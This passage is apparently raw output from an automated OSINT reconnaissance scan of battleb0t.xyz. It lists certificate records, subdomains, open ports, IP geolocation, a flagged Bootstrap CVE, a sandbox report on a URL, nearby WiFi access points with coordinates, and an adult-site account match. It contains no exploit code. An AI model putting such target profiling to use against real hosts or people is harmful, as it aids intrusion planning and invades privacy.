u'5a0559923d0fdaac1fc6a74472ffcb94c92e25a29d8d9a48166bcad2947f18e1', u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z', u'cert': {u'data': u'MIIFMTCCBBmgAwIBAgISBJEIZbRWlOOJN2vI7lr89IBSMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzA1MTFaFw0yMzA1MjUwMzA1MTBaMCExHzAdBgNVBAMTFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCXS5qUM658XpEb2FQiye1Pjdwc6oLnwWa4DnrXaX6XESwapQ5kFhLVlLMj8jbUT+vVMlCs5NdmG+PakXkEZvQt+j5F9EiRGo2AgsrdZhjN8p2HDZYJNvCQUHSzj9HUq+U8uqatV2IiK2DebnYEAl36UoC3YWvKiQ5ROMPyTcGPPlwvhux67sSpCWf+OjYs9HHdY1LHfiQTO/hkrA8XZYtPEtu6i5bXp9Nc/Y/pJrDB086upICbjZsf9spKiE++7SgvRRKN7ShK4dcK0cxPOA/6ky2NSpI6iIIBJKdiUpWIy/Uh604fFFn7oPNTbG4g4coLg0Y2NMYiFxvY5oIkaMplAgMBAAGjggJQMIICTDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFNUp10YCZXNl/PWnfC5vlnnYZ6TmMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCEGA1UdEQQaMBiCFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggEDBgorBgEEAdZ5AgQCBIH0BIHxAO8AdgC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBmKzyAAAEAwBHMEUCICWgaft/PmN9oILwvZn6/4Qgr8WGgSRL98ur+169a4dWAiEAilZEKCsL5dY69BV+Cjy6gEc40xNl1o6o5QEE0+3XKCQAdQB6MoxU2LcttiDqOOBSHumEFnAyE4VNO9IrwTpXo1LrUgAAAYaBmK0EAAAEAwBGMEQCIEhQdyenjelORFvktFZQ+yD8yP0PS9xoCKRWpUv1pUezAiBBtKAPIhxp6PP7YLKBYWLg3Sg3E350KyZ04f3lTSlh5zANBgkqhkiG9w0BAQsFAAOCAQEAYbTvc/w81jb1dYAMM4uaBQvE73IdaXSV/QqEvbi5PBKH0+sttdJjKilgWcQRHA/D+3kvikNXOGLYLmg0u2wOeuP4PfXBBaVtk7mzSCKOozlm5qWe3OKYNX6z4ceyFrewLnBQTuqT0PhcaWwb0j7u2mQfrZfIvhc4pu2SnjvbZ8iwX+av/fdXknuHPb/EwSETusTYhaNj3JDu3z0qvANOuhuMDBZ+WOOsf9w7QBgfdJjVxPoymZWgZB5bTaj1eTMuP0PcjQ59KCV0epMnUy5rrk2BwTzgzUICbfza81JX1bFwjhqRFcgbk81AuP8p58YFrWOMyOzX6Ygzo11DodW5IA==', u'sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'type': u'cert'}, u'dns_names': [u'oldfluid.battleb0t.xyz'], u'tbs_sha256': u'11231ecf169618aac453b5e600bca74016c90998389238bc78e25a336ea53b60', u'id': u'4865013513', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'b65f3ba1cf72aeba89e3a802dee04c06a05e779c0cfeacdd6cb8cefb55c4e2da', u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z', u'cert': {u'data': u'MIIFNTCCBB2gAwIBAgISBLY5M6/eHjLz/C523LwIUYYQMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjUwMTM5MjVaFw0yMzA1MjYwMTM5MjRaMBgxFjAUBgNVBAMTDWJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCrxxsM7cYB+Oqps88IF0+iy3w0xGYS5u/zmBd5yWXuZkwfmpJ9M+4H+i4VYve08x/VTy6xZ6hJQr/jzJq3MEbCaPUoqWRpb0xLZCTJ3O1Gn6Qfwu9vNtC8aSe44tYYcEAstPXuj/cNjG4Dkudd1j68u8lbKBCgWvY39eGeFSNybo5pAQmkjKTJ19sFAZBIS5AgjDh6CmB0eRgmMI5gCxe5JKCA3z8UANMJ5zRHNWN8VNKgneFX0csT0zwwJJeO6jQAn8xsDGr3VLxeYNxGMcIJ3tnD42MejxzFkJDo2oa+ffHDHxqGaZsL4LIMRwjIklkrZi/6oTihLxBl9pf9FoczAgMBAAGjggJdMIICWTAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFGNOFYVWWqSUAsIWQqSll5o4AleXMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCsGA1UdEQQkMCKCDWJhdHRsZWIwdC54eXqCEXd3dy5iYXR0bGViMHQueHl6MEwGA1UdIARFMEMwCAYGZ4EMAQIBMDcGCysGAQQBgt8TAQEBMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly9jcHMubGV0c2VuY3J5cHQub3JnMIIBBgYKKwYBBAHWeQIEAgSB9wSB9ADyAHcAejKMVNi3LbYg6jjgUh7phBZwMhOFTTvSK8E6V6NS61IAAAGGhnCAVAAABAMASDBGAiEAh/Y8suDCe/RZMkn/hO7hrF2hfoTeuKySO5eYbccRB9ACIQCOoXkcH72OFd6rl/5A4dnCHD5VPTnfiLg+MDLqz1Gg8wB3AOg+0No+9QY1MudXKLyJa8kD08vREWvs62nhd31tBr1uAAABhoZwgDYAAAQDAEgwRgIhAMDKSjoBecX3TRhscOh0pPwxXkb/27xVeRxr0yp3M5J9AiEAs2yzzZRuQAdUQ84z4D/CSUjcGSNE5J2LfuF/Rs4Y77YwDQYJKoZIhvcNAQELBQADggEBALLjqCzluns+jvveBcnb3xDhOkrUyOkWdjExuB2H40IVXNkB0eMhFJYNA9arKrtu2pcQ/rEDSKt+bXuWbeA6WumULoOuP6iljCU6qcUdY4oNVU1UyDoX1HJydnidKSo73vUKTNhEgh8aKcxcLL9+23F8UOOR/pU/04dfMDdI7GO2oawzrGMFso9t7p4urFBZ6UFG0nFlBRdC2T4hndeQOaaPLehK1P9tnjLGggWPpLV0tHDfKEtQyBs2Gq7Pe6uSI+Z3l/JHpLBS8p3PvmiiivIv8GYL0zQqx4o1xBwzLeWQ3lanl4Z8l8lFj5lhIgA9qrKHDTW7TPP4HPiZwejRMMY=', u'sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'type': u'cert'}, u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'tbs_sha256': u'5d9c34221e2de124f32114bf34c005fc414285d1b7cc7cab0bb0bd4e745c7797', u'id': u'4869370950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afa |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.206): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.63): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | admire_me (Category: XXXPORNXXX)
https://admireme.vip/login/ | login |
| 2023-05-12 02:46:19 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://zip.co/us/quadpay-terms-of-service', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 18, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://cytoscape.org/download.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:7904:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7904:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "InternetShortcutMutex"\n "Local\\SM0:7980:304:WilStaging_02"\n "SM0:7980:120:WilError_01"\n "Local\\SM0:7980:120:WilError_01"\n "SM0:7904:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "Local\\SM0:7904:304:WilStaging_02"\n "SM0:7904:304:WilStaging_02"\n "Local\\SM0:7904:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7904:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7904:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:49724"\n "184.30.148.171:49727"\n "69.16.175.42:49728"\n "104.18.11.207:49729"\n "142.251.214.130:49731"\n "192.229.210.155:49732"\n "18.155.181.7:49735"\n "172.217.164.104:49736"\n "142.250.189.238:49738"\n "108.138.246.126:49741"\n "142.251.32.34:49742"\n "18.155.202.90:49744"\n "142.250.191.78:49747"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cytoscape.org"\n "netdna.bootstrapcdn.com"\n "www.paypalobjects.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"www.paypalobjects.com" (Indicator: "paypal")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00007904]\n "Tabs_13324449104417521" has type "data"- [targetUID: N/A]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- [targetUID: N/A]\n "f_00023e" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00007904]\n "31ec86e4-313c-4ec0-bdbb-d83d42302c58.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "f_000243" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000243]- [targetUID: 00000000-00006444]\n "f_00023d" has type "Web Open Font Format TrueType length 23320 version 1.0"- [targetUID: N/A]\n "manifest.json" has type "JSON data"- Location: [%TEMP%\\7904_1910241172\\manifest.json]- [targetUID: 00000000-00007904]\n "60f652af-af71-4e18-8f97-f706eb4108c1.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\60f652af-af71-4e18-8f97-f706eb4108c1.tmp]- [targetUID: 00000000-00006444]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\manifest.fingerprint]- [targetUID: 00000000-00007904]\n "manifest.json" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- Location: [%TEMP%\\7904_1910241172\\manifest.json]- [targetUID: 00000000-00007904]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007904]\n "445bab36-3288-43e7-bd99-0a1f57dab7f9.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\445bab36-3288-43e7-bd99-0a1f57dab7f9.tmp]- [targetUID: 00000000-00007904]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007904]\n "5b5217f9-d4db-409c-ba93-ec543a9e387e.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\5b5217f9-d4db-409c-ba93-ec543a9e387e.tmp]- [targetUID: 00000000-00007904]\n "62937efd7e73cf26_0" has type "data"- [targetUID: N/A]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00007904]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7904_406352213\\edge_driver.js]- [targetUID: 00000000-00007904]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\7904_2089643085\\_metadata\\verified_contents.json]- [targetUID: 00000000-00007904]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://cytoscape.org/download.html"\n Pattern match: "Math.PI/180"\n Heuristic match: "cytoscape.org"\n Pattern match: "https://cytoscape.org"\n Heuristic match: "netdna.bootstrapcdn.com"\n Pattern match: "www.paypalobjects.com"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applied_policy:block,domain:mozilla.github.io},{applied_policy:block,domain:html5test.com},{applied_policy:block,domain:necromanthus.com},{app"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoint.officeapps.live.com/*,https://*word-edit.officeapps.live.com/*,https://*excel.partner.officewebapps.cn/*,https://*onenote.partner.officewebapps.cn/*,"\n Pattern match: "cytoscape.org/download.html"\n Heuristic match: "ytoscape.org"\n Heuristic match: "boxguest.sy"\n Heuristic match: "PATHEXT=.COM;.EXE;.BAT;.CM"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/91 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7904_406352213\\edge_driver.js]- [targetUID: 00000000-00007904]\n "edge_tracking_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7904_406352213\\edge_tracking_page_validator.js]- [targetUID: 00000000-00007904]\n "shoppingfre.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7904_406352213\\shoppingfre.js]- [targetUID: 00000000-00007904]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\7904_1134394539\\adblock_snippet.js]- [targetUID: 00000000-00007904]\n "shopping_iframe_driver.js" has type "Unknown"- Location: [%TEMP%\\7904_406352213\\shopping_iframe_driver.js]- [targetUID: 00000000-00007904]\n "edge_confirmation_page_validator.js" has type "Unknown"- Location: [%TEMP%\\7904_406352213\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00007904]\n "auto_open_controller.js" has type "Unknown"- Location: [%TEMP%\\7904_406352213\\auto_open_controller.js]- [targetUID: 00000000-00007904]\n "shopping.js" has type "Unknown"- Location: [%TEMP%\\7904_406352213\\shopping.js]- [targetUID: 00000000-00007904]\n "product_page.js" has type "Unknown"- Location: [%TEMP%\ | 185.199.111.153 |
| 2023-05-12 02:47:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 185.199.111.153:443 | 185.199.111.153 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | fse2 (Net ID: 00:01:38:A0:A1:09) | 37.7813933,-122.3918002 |
| 2023-05-12 03:09:18 | Vulnerability - General | Yes | Tool - Retire.js | 0 | 0 | 4 | 0 | None | CVE-2016-10735
Score: Unknown
Description: Unknown | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | do not seek the treasure (Net ID: 00:01:24:F1:72:12) | 34.0544, -118.244 |
| 2023-05-12 02:46:03 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | North Charleston, South Carolina, 29415, United States, North America | 34.148.97.127 |
| 2023-05-12 02:46:50 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 34.74.170.74 |
| 2023-05-12 03:32:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.17:80 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | drapnet (Net ID: 00:09:5B:52:69:9E) | 39.0469, -77.4903 |
| 2023-05-12 02:44:19 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | [{u'pubkey_sha256': u'b1d8ad495b85281ccdd8ee8835d1b0223d8372b54869daf463e92de6ed172160', u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z', u'cert': {u'data': u'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', u'sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'type': u'cert'}, u'dns_names': [u'nuke.battleb0t.xyz'], u'tbs_sha256': u'2c51d3eac2fd15713d1b21dd3bb3fdf96ca51847d8b13529deb5504b935d64ba', u'id': u'4818192950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'2307411ab1a35cbd27d910826dd73a859c805fd0ba153a66badcd9b93076677b', u'cert_sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z', u'cert': {u'data': u'MIIFKjCCBBKgAwIBAgISA5eZXGCsQGj4st4KZ3rat9EWMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzAyNTNaFw0yMzA1MjUwMzAyNTJaMB4xHDAaBgNVBAMTE2ZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDtvNBxdfnBUXlJ+CVs4kt6BeErbHlEmP+yzLzX2iclKTfHuoDL4Xy4TTeivJNE67xi/0fLIeo9BUwEV4KTW6klKfuYM7AEdKq8mmRex+Js5ewq50Br4XWTObPPuOkRKebRnghWVBafwR0f9fbKSDqUUwMdv1KvbiedgI3wVyjU8AE09DlZSt+fAEeHmjk4wY+EigILsm5cNqL2NebSI2spsRWqhqNb6zDMr7jf1Q6Pjil+DSEo0NJMcVsZAZvcuZCIffxdPnJE5kYR3eb9pUKjByTnKdkpHPNyd4vLC99FNAuBqADe8BN0G78vYa1lcyk+BbXDkCiMlu/Lswa6m2v3AgMBAAGjggJMMIICSDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFMSFgqNe7U1U6Q29Aqxnsvrz4Vg/MB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMB4GA1UdEQQXMBWCE2ZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggECBgorBgEEAdZ5AgQCBIHzBIHwAO4AdQC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBlpBHAAAEAwBGMEQCICjxcLLm9aGcwyq5mLfK3kYGig39XVFiap6vpxj4VtGwAiAhpNN7m5SlM1cl6vnpa33bPptwrJlHu2Ch2NSf4J/0RAB1AK33vvp8/xDIi509nB4+GGq0Zyldz7EMJMqFhjTr3IKKAAABhoGWkIMAAAQDAEYwRAIgPen/cKNLJEXeMs3B69ZoUOiQORdwZS/DjifvjwosEkICIGO9t4hTEa50wIw+3Zov1uU0pIyiq0OMZH6b0o6QCM5gMA0GCSqGSIb3DQEBCwUAA4IBAQB+MVu1xgwWJwv1GrOAp+9eXxuHOLeKvlxLKj8oK0+HX8K007e++Cj1FcezPz1AtAOklQYBGlgfdTZL7GVa4P2wv0Hj/1dO3QVHLOV0yFpYGdZTYfaNDhkpXd2yE+jFTH5o3PK0BVoTjtIuTl6BEKWGjzAw92FKb1wXDaTvEwIFSLAYrJzfJHAS40SsMVT1tpL07LbnFpMjx7h+UVz3BTMcDnqzPe0hA9K8pb8QgR9MedQ6c7mTn1eLmOo+dDlwmT06wPJN4VXt3ElOpjmlguotbukXxnJ17BBy0Mk+uTBpvC9wBjy6MbbBDEXmkoh4VjrUDNIyuEk388RtFWlUmQrZ', u'sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'type': u'cert'}, u'dns_names': [u'fluid.battleb0t.xyz'], u'tbs_sha256': 